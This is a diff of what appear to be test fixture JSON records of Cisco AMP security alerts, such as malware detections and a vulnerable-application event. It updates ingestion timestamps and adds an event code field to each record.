@@ -1634,8 +1650,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:08.619311865Z",
+                "ingested": "2021-09-30T00:14:16.070160132Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}",
+                "code": "1107296272",
                 "kind": "alert",
                 "start": "2021-01-15T10:22:29.000Z",
                 "action": "Executed malware",
@@ -1727,8 +1744,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619313625Z",
+                "ingested": "2021-09-30T00:14:16.070162179Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669929038643000",
@@ -1812,8 +1830,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619315366Z",
+                "ingested": "2021-09-30T00:14:16.070164200Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669929038643000",
@@ -1897,8 +1916,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619317120Z",
+                "ingested": "2021-09-30T00:14:16.070166224Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669929038643000",
@@ -1986,8 +2006,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619318845Z",
+                "ingested": "2021-09-30T00:14:16.070168263Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669671340605000",
@@ -2075,8 +2096,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619320591Z",
+                "ingested": "2021-09-30T00:14:16.070170310Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669671340605000",
@@ -2160,8 +2182,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619322298Z",
+                "ingested": "2021-09-30T00:14:16.070172324Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669671340605000",
@@ -2245,8 +2268,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619324132Z",
+                "ingested": "2021-09-30T00:14:16.070174535Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669667045638000",
@@ -2324,8 +2348,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:41:08.619325873Z",
+                "ingested": "2021-09-30T00:14:16.070176587Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}",
+                "code": "1107296279",
                 "kind": "alert",
                 "start": "2021-01-15T10:20:00.000Z",
                 "action": "Vulnerable Application Detected",
@@ -2427,8 +2452,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619327604Z",
+                "ingested": "2021-09-30T00:14:16.070178610Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669409347600000",
@@ -2512,8 +2538,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619329338Z",
+                "ingested": "2021-09-30T00:14:16.070180588Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669409347600000",
@@ -2597,8 +2624,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619331077Z",
+                "ingested": "2021-09-30T00:14:16.070182611Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669405052633000",
@@ -2686,8 +2714,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619332801Z",
+                "ingested": "2021-09-30T00:14:16.070184598Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669147354595000",
@@ -2771,8 +2800,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619334524Z",
+                "ingested": "2021-09-30T00:14:16.070186589Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669147354595000",
@@ -2856,8 +2886,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619336260Z",
+                "ingested": "2021-09-30T00:14:16.070188588Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533669143059628000",
@@ -2935,8 +2966,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619337963Z",
+                "ingested": "2021-09-30T00:14:16.070190593Z",
